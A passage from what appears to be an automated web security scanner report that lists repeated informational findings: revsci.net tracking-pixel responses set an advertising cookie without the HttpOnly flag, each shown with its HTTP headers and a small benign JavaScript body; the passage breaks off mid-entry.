rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kp+7NKotVmC6B0xoih8KOY2GgoDUHMLaF6Bd63X2lVVR6H9spRjI4FbNogsnrmd1Nb6qpiEPnmtStnvPL+ZHYhTdMJWQMP4bJ8NI8lb3ZqPJL0VV4AxaiAwL6eGmV5A9TFGc/tmK2wU5BZe4fCR0Dgju8cK4XB6lERNTZXxfcBhrADJYkSt7Dm6t76rF7GLRUdrdKIeG1Q3xoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:53:23 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kp+7NKotVmC6B0xoih8KOY2GgoDUHMLaF6Bd63X2lVVR6H9spRjI4FbNogsnrmd1Nb6qpiEPnmtStnvPL+ZHYhTdMJWQMP4bJ8NI8lb3ZqPJL0VV4AxaiAwL6eGmV5A9TFGc/tmK2wU5BZe4fCR0Dgju8cK4XB6lERNTZXxfcBhrADJYkSt7Dm6t76rF7GLRUdrdKIeG1Q3xoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:53:23 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:53:23 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.195. http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/47135208.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZHSvnrXbZhwnrg+Sti3jYa16vkgNMv8HjFHDQP/2HO42kRP80ce/k4WsU6sAiJISH2/r3PUaypbi/tEnX3NAxVJBIsGOZSzR3RzxPTgs1nQn1LBhYdUF376uHnA56pGp24XOD3JcIhDw8d59s8JqjhNmXwRXJJ48CbQDFR9cy7Ms7Wr21xeDzQz7bkPEsPq+xz5XLKjbPvWVHlEckSUWh3YwCmrlAv9RCj58g0lTP4pLvuCeK1RV+seBswg0K/TXQ8nu6PZVdN909hJu5E3Ssxo/ZDBnZ603pUglwBZNtps8MXjN8V1oGcp/Ol7HkTm5qzeShAm/6S2rtXzaEYwm3wefc3NAePEy2cUAH4mu25Cz/7xFtrTLDRXshiG7zkOhTXyWFMDmAv6yqFMJWypL5kg0W9n0hIkdKUZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:43:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZHSvnrXbZhwnrg+Sti3jYa16vkgNMv8HjFHDQP/2HO42kRP80ce/k4WsU6sAiJISH2/r3PUaypbi/tEnX3NAxVJBIsGOZSzR3RzxPTgs1nQn1LBhYdUF376uHnA56pGp24XOD3JcIhDw8d59s8JqjhNmXwRXJJ48CbQDFR9cy7Ms7Wr21xeDzQz7bkPEsPq+xz5XLKjbPvWVHlEckSUWh3YwCmrlAv9RCj58g0lTP4pLvuCeK1RV+seBswg0K/TXQ8nu6PZVdN909hJu5E3Ssxo/ZDBnZ603pUglwBZNtps8MXjN8V1oGcp/Ol7HkTm5qzeShAm/6S2rtXzaEYwm3wefc3NAePEy2cUAH4mu25Cz/7xFtrTLDRXshiG7zkOhTXyWFMDmAv6yqFMJWypL5kg0W9n0hIkdKUZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:43:03 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:43:03 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.196. http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/474207582.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N9VsKld5Cvqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/011PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS7Sbx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9a3RoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:37:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N9VsKld5Cvqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/011PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS7Sbx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9a3RoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:37:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:37:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.197. http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/48193081.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QYEvZjybQVdzPgDlAfmqRuz5eOiQHgdKtZ6+0GVBaWGSGXv2awNuIYpbEfWDSeC95RH9v496KovSxzmy0QeQtRVtIHaEMUwGA7gJSahwg8lJOmUN8MQxN/P/0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:21:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QYEvZjybQVdzPgDlAfmqRuz5eOiQHgdKtZ6+0GVBaWGSGXv2awNuIYpbEfWDSeC95RH9v496KovSxzmy0QeQtRVtIHaEMUwGA7gJSahwg8lJOmUN8MQxN/P/0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:21:12 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:21:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.198. http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/482745036.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOeqAX2dHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0R58oFoFlDVAZ0Q4WilEZa1mbBjW7OLLoFHNs08LFTYGZVXlxUvEZzx6zjOYyj3SuXnsHKw1Hvruz3Uf+BvgDGGbJFLjv17ScTkhkvU4QksCyof4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/KhztJWUGMe/sHwrlis9rTQ4OBxCCmn++3BZxuPdVxi72aac440Q/3qnyjjl2l8QCPhNcivyQRKN1wF41CvAMSuXqscYt7nj+CdF1MH095+w6kmZgwek1xMzZ4zky0gS2QxO463ZSF9wyEYAPJHWdj2jbkj/QfHReEGjT1LQCFxv+id019oHQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:48:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOeqAX2dHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0R58oFoFlDVAZ0Q4WilEZa1mbBjW7OLLoFHNs08LFTYGZVXlxUvEZzx6zjOYyj3SuXnsHKw1Hvruz3Uf+BvgDGGbJFLjv17ScTkhkvU4QksCyof4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/KhztJWUGMe/sHwrlis9rTQ4OBxCCmn++3BZxuPdVxi72aac440Q/3qnyjjl2l8QCPhNcivyQRKN1wF41CvAMSuXqscYt7nj+CdF1MH095+w6kmZgwek1xMzZ4zky0gS2QxO463ZSF9wyEYAPJHWdj2jbkj/QfHReEGjT1LQCFxv+id019oHQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:48:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:48:06 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.199. http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/518130278.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLS+N2tYOPb7H7ylEiZki5tHLRQw4mVwn8auJCEmHJ3qgLOl1PDKKRoQc/UBmorHEc/TIHBCVRVSZrobvtLMxEgZPYynL0er8BWtYtV0dJ53KZo9p/px9SgRp/FzXhLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXCa526djlE801fgUQBozQLnN1pbn0BVzaKGWpJbKR4+rCv9Jg3W1uFamSDB2IRqxAc8a9cD4KfEOirCQjLCYkPuN/9svloFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:32:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLS+N2tYOPb7H7ylEiZki5tHLRQw4mVwn8auJCEmHJ3qgLOl1PDKKRoQc/UBmorHEc/TIHBCVRVSZrobvtLMxEgZPYynL0er8BWtYtV0dJ53KZo9p/px9SgRp/FzXhLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXCa526djlE801fgUQBozQLnN1pbn0BVzaKGWpJbKR4+rCv9Jg3W1uFamSDB2IRqxAc8a9cD4KfEOirCQjLCYkPuN/9svloFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:32:37 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:32:36 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.200. http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/541993060.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPFJEOhuQIMl594t637QLtKTShEEKPJgKWhVTM46g7k86fOUpoPyGpQqGmcAHhFlCRHJGrM+4CmMoLwQLoTCqr3r5XW6u03GkRNJjXLei6plrNgyTAAsKikEDJN/pB8U+M+b3xP8ojR3+OZiCn0i2H77rUVjAauYFVUKFcsYrxeWij6nJgx3+Gf1WrB8lgxYfycBUfr+CXUks1meFbpP4az8/adW8e49o2vd1ny0p4awJ64X0qjMWasPQO0EJBML5McgVuwLcgO6T5+9Nlp1mTNSdYYZBGGmwu8b5LKBMMmLdsD3BytbCGmRwoYJXospn2+QD5OY3P63/qDVLCvOIi9f3QBnZ+mHYyYVcngr+NnGKxjmjMvhro31bsmykCXUEuEgK1HseeR9BjchOMl6eN6J1A67kb9UDRgZ0j1gYja1H29543tuAXbNSRPV8z+qvXkRxwH+thAuFL3oQkGd6o7UHM40i6g5gjPpGzkICQ6X/a6ftJ3kQWadfhcierQ3j1ZFK11BQtk1eaIciNu35/SMCnk+27YhTfShegD4cH961OlnmdDbHYFIhT8n08zlVRclWf901wWSDLYIr/mEr3o0mJoTh3rUErWzu3HXRvpemu6RBDsGcUcVGcv5hUjDSWIjbJZ/pJrkdAaCRetuood49LBYp0w; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:14:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJEOhuQIMl594t637QLtKTShEEKPJgKWhVTM46g7k86fOUpoPyGpQqGmcAHhFlCRHJGrM+4CmMoLwQLoTCqr3r5XW6u03GkRNJjXLei6plrNgyTAAsKikEDJN/pB8U+M+b3xP8ojR3+OZiCn0i2H77rUVjAauYFVUKFcsYrxeWij6nJgx3+Gf1WrB8lgxYfycBUfr+CXUks1meFbpP4az8/adW8e49o2vd1ny0p4awJ64X0qjMWasPQO0EJBML5McgVuwLcgO6T5+9Nlp1mTNSdYYZBGGmwu8b5LKBMMmLdsD3BytbCGmRwoYJXospn2+QD5OY3P63/qDVLCvOIi9f3QBnZ+mHYyYVcngr+NnGKxjmjMvhro31bsmykCXUEuEgK1HseeR9BjchOMl6eN6J1A67kb9UDRgZ0j1gYja1H29543tuAXbNSRPV8z+qvXkRxwH+thAuFL3oQkGd6o7UHM40i6g5gjPpGzkICQ6X/a6ftJ3kQWadfhcierQ3j1ZFK11BQtk1eaIciNu35/SMCnk+27YhTfShegD4cH961OlnmdDbHYFIhT8n08zlVRclWf901wWSDLYIr/mEr3o0mJoTh3rUErWzu3HXRvpemu6RBDsGcUcVGcv5hUjDSWIjbJZ/pJrkdAaCRetuood49LBYp0w; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:14:58 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:14:58 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.201. http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/572738137.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhKRGZKRTjLTQMJBSE/72npTsNpRoMWq+9TTgWL2ZvvxerT8SkTMMg3mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTnO7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSmYQE/BtirGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9duyBWNNA=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:04:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
